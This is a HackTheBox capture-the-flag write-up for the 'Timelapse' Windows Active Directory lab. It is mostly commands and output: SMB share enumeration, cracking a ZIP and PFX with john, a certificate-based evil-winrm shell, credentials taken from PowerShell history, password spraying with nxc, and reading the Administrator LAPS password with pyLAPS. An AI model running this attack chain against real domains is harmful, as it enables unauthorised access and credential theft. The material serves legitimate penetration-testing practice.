WriteupsHTB — Timelapse
ADEasyWindows
HTB — Timelapse
SMB share contains ZIP with password-protected PFX certificate. Cracked PFX used for WinRM. LAPS password read via LDAP for Administrator.
January 21, 2025HackTheBox
#AD#LAPS#PFX#WinRM
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.152
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-21 00:41 EST
Nmap scan report for 10.10.11.152
Host is up (0.024s latency).
Not shown: 65518 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-21 13:42:54Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl?
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl?
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
| tls-alpn:
|_ http/1.1
|_http-title: Not Found
|_ssl-date: 2025-01-21T13:44:28+00:00; +7h59m59s from scanner time.
| ssl-cert: Subject: commonName=dc01.timelapse.htb
| Not valid before: 2021-10-25T14:05:29
|_Not valid after: 2022-10-25T14:25:29
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (89%)
Aggressive OS guesses: Microsoft Windows Server 2019 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m58s
| smb2-time:
| date: 2025-01-21T13:43:50
|_ start_date: N/A
TRACEROUTE (using port 139/tcp)
HOP RTT ADDRESS
1 25.77 ms 10.10.14.1
2 25.87 ms 10.10.11.152
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 189.27 seconds445
sh
445/tcp open microsoft-ds?sh
smbclient -N -L \\\\10.10.11.152
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup availablesh
smbclient \\\\10.10.11.152\\Shares -U ''
Password for [WORKGROUP\]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Oct 25 11:39:15 2021
.. D 0 Mon Oct 25 11:39:15 2021
Dev D 0 Mon Oct 25 15:40:06 2021
HelpDesk D 0 Mon Oct 25 11:48:42 2021sh
smb: \> cd Dev
smb: \Dev\> ls
. D 0 Mon Oct 25 15:40:06 2021
.. D 0 Mon Oct 25 15:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 11:46:42 2021
6367231 blocks of size 4096. 1288040 blocks available
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (24.8 KiloBytes/sec) (average 24.8 KiloBytes/sec)sh
smb: \> cd HelpDesk\
smb: \HelpDesk\> ls
. D 0 Mon Oct 25 11:48:42 2021
.. D 0 Mon Oct 25 11:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 10:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 10:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 10:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 10:57:44 2021sh
smb: \HelpDesk\> mget *
Get file LAPS.x64.msi? y
getting file \HelpDesk\LAPS.x64.msi of size 1118208 as LAPS.x64.msi (4029.5 KiloBytes/sec) (average 2926.6 KiloBytes/sec)
Get file LAPS_Datasheet.docx? y
getting file \HelpDesk\LAPS_Datasheet.docx of size 104422 as LAPS_Datasheet.docx (849.8 KiloBytes/sec) (average 2422.1 KiloBytes/sec)
Get file LAPS_OperationsGuide.docx? y
getting file \HelpDesk\LAPS_OperationsGuide.docx of size 641378 as LAPS_OperationsGuide.docx (4232.1 KiloBytes/sec) (average 2839.4 KiloBytes/sec)
Get file LAPS_TechnicalSpecification.docx? y
getting file \HelpDesk\LAPS_TechnicalSpecification.docx of size 72683 as LAPS_TechnicalSpecification.docx (676.0 KiloBytes/sec) (average 2535.3 KiloBytes/sec)sh
7c3XlgsEwinrm_backup.zip
sh
unzip winrm_backup.zip -d winrm_backup
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: sh
zip2john winrm_backup.zip > winrm_backup.hashsh
john winrm_backup.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx) sh
unzip winrm_backup.zip -d winrm_backup
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password: supremelegacy
inflating: winrm_backup/legacyy_dev_auth.pfxpfx with evil-winrm
sh
ls
legacyy_dev_auth.pfxsh
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out pub.pem
Enter Import Password:sh
john legacyy_dev_auth.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 128/128 SSE2 4x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx) extract public key from .pfx
sh
openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out pub.pem
Enter Import Password: thuglegacyextract private key from .pfx
sh
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -nodes -out priv.pem
Enter Import Password: thuglegacy- https://wadcoms.github.io/wadcoms/Evil-Winrm-PKINIT/
sh
evil-winrm -i 10.10.11.152 -c pub.pem -k priv.pem -S -r timelapse.htbsh
evil-winrm -i 10.10.11.152 -c pub.pem -k priv.pem -S -r timelapse.htb
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy
user.txt
sh
*Evil-WinRM* PS C:\Users\legacyy\Desktop> cat user.txt
1aea1a38...winpeas
sh
*Evil-WinRM* PS C:\users\legacyy> upload /home/sake/htb-labs/Timelapse/winrm_backup/winPEASx64.exepowershell history
sh
*Evil-WinRM* PS C:\> cat C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exitcreds
E3R$Q62^12p7PLlC%KWaxuaV
sh
*Evil-WinRM* PS C:\> net user /domain
User accounts for \\
-------------------------------------------------------------------------------
Administrator babywyrm Guest
krbtgt legacyy payl0ad
sinfulz svc_deploy thecybergeek
TRX
The command completed with one or more errorsusers
txt
Administrator
sinfulz
TRX
babywyrm
legacyy
svc_deploy
Guest
payl0ad
thecybergeeksh
nxc smb 10.10.11.152 -u users.txt -p 'E3R$Q62^12p7PLlC%KWaxuaV' --continue-on-success
SMB 10.10.11.152 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.152 445 DC01 [-] timelapse.htb\Administrator:E3R$Q62^12p7PLlC%KWaxuaV STATUS_LOGON_FAILURE
SMB 10.10.11.152 445 DC01 [-] timelapse.htb\sinfulz:E3R$Q62^12p7PLlC%KWaxuaV STATUS_LOGON_FAILURE
SMB 10.10.11.152 445 DC01 [-] timelapse.htb\TRX:E3R$Q62^12p7PLlC%KWaxuaV STATUS_LOGON_FAILURE
SMB 10.10.11.152 445 DC01 [-] timelapse.htb\babywyrm:E3R$Q62^12p7PLlC%KWaxuaV STATUS_LOGON_FAILURE
SMB 10.10.11.152 445 DC01 [-] timelapse.htb\legacyy:E3R$Q62^12p7PLlC%KWaxuaV STATUS_LOGON_FAILURE
SMB 10.10.11.152 445 DC01 [+] timelapse.htb\svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
SMB 10.10.11.152 445 DC01 [-] timelapse.htb\Guest:E3R$Q62^12p7PLlC%KWaxuaV STATUS_LOGON_FAILURE
SMB 10.10.11.152 445 DC01 [-] timelapse.htb\payl0ad:E3R$Q62^12p7PLlC%KWaxuaV STATUS_LOGON_FAILURE
SMB 10.10.11.152 445 DC01 [-] timelapse.htb\thecybergeek:E3R$Q62^12p7PLlC%KWaxuaV STATUS_LOGON_FAILURE creds
svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV
winrm svc_deploy 5986 SSL
- make sure to add
-Sflag
sh
evil-winrm -i 10.10.11.152 -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV'sh
evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
bloodhound
sh
sudo bloodhound-python -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -ns 10.10.11.152 -d timelapse.htb -c all
zip -r timelapse.zip *.json domain admins
LAPS_READERS
sh
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> net user svc_deploy
User name svc_deploy
Full Name svc_deploy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/25/2021 11:12:37 AM
Password expires Never
Password changeable 10/26/2021 11:12:37 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/21/2025 3:05:43 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *LAPS_Readers *Domain Users
The command completed successfully.
ReadLAPSPasword
To abuse this privilege with PowerView's Get-DomainObject, first import PowerView into your agent session or into a PowerShell instance at the console. You may need to authenticate to the Domain Controller as a member of LAPS_READERS@TIMELAPSE.HTB if you are not running a process as a member. To do this in conjunction with Get-DomainObject, first create a PSCredential object (these examples comes from the PowerView help documentation):
sh
*Evil-WinRM* PS C:\Users\svc_deploy> upload /home/sake/htb-labs/Timelapse/PowerView.ps1powershell
$SecPassword = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TIMELAPSE\svc_deploy', $SecPassword)Then, use Get-DomainObject, optionally specifying $Cred if you are not already running a process as LAPS_READERS@TIMELAPSE.HTB:
powershell
Get-DomainObject windows1 -Credential $Cred -Properties "ms-mcs-AdmPwd",name- https://github.com/p0dalirius/pyLAPS
sh
python3 pyLAPS.py --action get -d "TIMELAPSE" -u "svc_deploy" -p 'E3R$Q62^12p7PLlC%KWaxuaV'
__ ___ ____ _____
____ __ __/ / / | / __ \/ ___/
/ __ \/ / / / / / /| | / /_/ /\__ \
/ /_/ / /_/ / /___/ ___ |/ ____/___/ /
/ .___/\__, /_____/_/ |_/_/ /____/ v1.2
/_/ /____/ @podalirius_
[+] Extracting LAPS passwords of all computers ...
| DC01$ : b[44$81@&495U8KI2)Kq,-Fs
[+] All done!sh
nxc smb 10.10.11.152 -u /home/sake/htb-labs/Timelapse/users.txt -p 'b[44$81@&495U8KI2)Kq,-Fs' --continue-on-success
SMB 10.10.11.152 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:timelapse.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.152 445 DC01 [+] timelapse.htb\Administrator:b[44$81@&495U8KI2)Kq,-Fs (Pwn3d!)- password is different because I resetted the lab
sh
evil-winrm -i 10.10.11.152 -u administrator -p 'Rjd[6ayf!]ka{6M8jnyb$769' -S root.txt
sh
*Evil-WinRM* PS C:\Users\TRX\Desktop> cat root.txt
c7a9e40c...Up next
HardJan 2025
HTB — Flight
LFI via lang parameter captures NTLM hash with Responder. Password spray, IIS WebDAV shell upload, RunasCs for lateral movement to Domain Admin.
Read writeup
EasyJan 2025
HTB — Return
Network printer admin panel LDAP credential exfiltration via attacker-controlled server. Server Operators group membership for domain privilege escalation.
Read writeup
HardJan 2025
HTB — Blackfield
ASREPRoasting yields crackable hash. ForceChangePassword on account via BloodHound. Volatility lsass dump reveals backup operator for DCSync.
Read writeup